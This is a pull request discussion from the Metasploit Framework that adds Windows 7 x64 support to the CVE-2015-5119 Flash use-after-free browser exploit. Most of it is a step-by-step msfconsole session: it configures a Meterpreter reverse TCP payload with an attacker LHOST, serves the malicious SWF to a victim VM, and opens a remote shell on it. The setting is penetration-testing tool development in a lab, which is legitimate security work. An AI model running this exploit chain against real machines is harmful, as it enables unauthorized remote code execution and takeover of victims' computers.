Add support for Windows 7 x64 IE 32bit (CVE-2015-5119 - adobe_flash_hacking_team_uaf)

[ghost]

• Search ROP gadgets from code section only.
• Change payload store address to work with win7 x64.

This patch also works Win7 x86 IE11 and Win8 x86 IE11 well.

[wchen-r7]

Hi @shin-sugar-yi, I believe your PR is missing an update for https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2015-5119/msf.swf (we do it w/ Flex SDK 4.6 + AIR 3.1). Thanks.

[ghost]

I did it.

[wchen-r7]

@shin-sugar-yi I'm on a Windows 7 x64 SP1 with IE 11 and Flash 18.0.0.194, but unable to get this patch to work. It just crashes. Please let us know how you'd like to proceed, thanks.

[ghost]

I can make it work as follows:

• metasploit v4.11.10-dev-e8cc8181269e6544b7be5e752e2aa4539f294484 (applied my msf.swf)
• Windows 7 x64 SP1 EN IE11 unpatched and Flash 18.0.0.194 on VMware Workstation
  or
• Windows 7 x64 SP1 EN IE11 Jan 2016 patched and Flash 18.0.0.194 on VirtualBox

Steps

• Replace data/exploits/CVE-2015-5119/msf.swf
• Start msfconsole
• use exploit/multi/browser/adobe_flash_hacking_team_uaf
• set PAYLOAD ...
• run
• Start IE and access
• It should get a session

msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf 
msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_hacking_team_uaf) > set LHOST 192.168.56.119
LHOST => 192.168.56.119
msf exploit(adobe_flash_hacking_team_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_flash_hacking_team_uaf) > set URIPATH /
URIPATH => /
msf exploit(adobe_flash_hacking_team_uaf) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.56.119:4444 
[*] Using URL: http://0.0.0.0:80/
msf exploit(adobe_flash_hacking_team_uaf) > [*] Local IP: http://127.0.0.1:80/
[*] Server started.

msf exploit(adobe_flash_hacking_team_uaf) > 
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Gathering target information.
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Sending HTML response.
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Request: /rGaaQS/
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Sending HTML...
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Request: /rGaaQS/AsvCG.swf
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Sending SWF...
[*] Sending stage (957999 bytes) to 192.168.56.117
[*] Meterpreter session 1 opened (192.168.56.119:4444 -> 192.168.56.117:49167) at 2016-02-12 16:59:29 +0900

msf exploit(adobe_flash_hacking_team_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7X64TJ7XH-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

[ghost]

I close this request to improve reliability of patch.

[mkunzsec]

Confirmed working on win7 x64 sp1 ie 11 x86 and flash 18.0.0.194, thanks for the pr!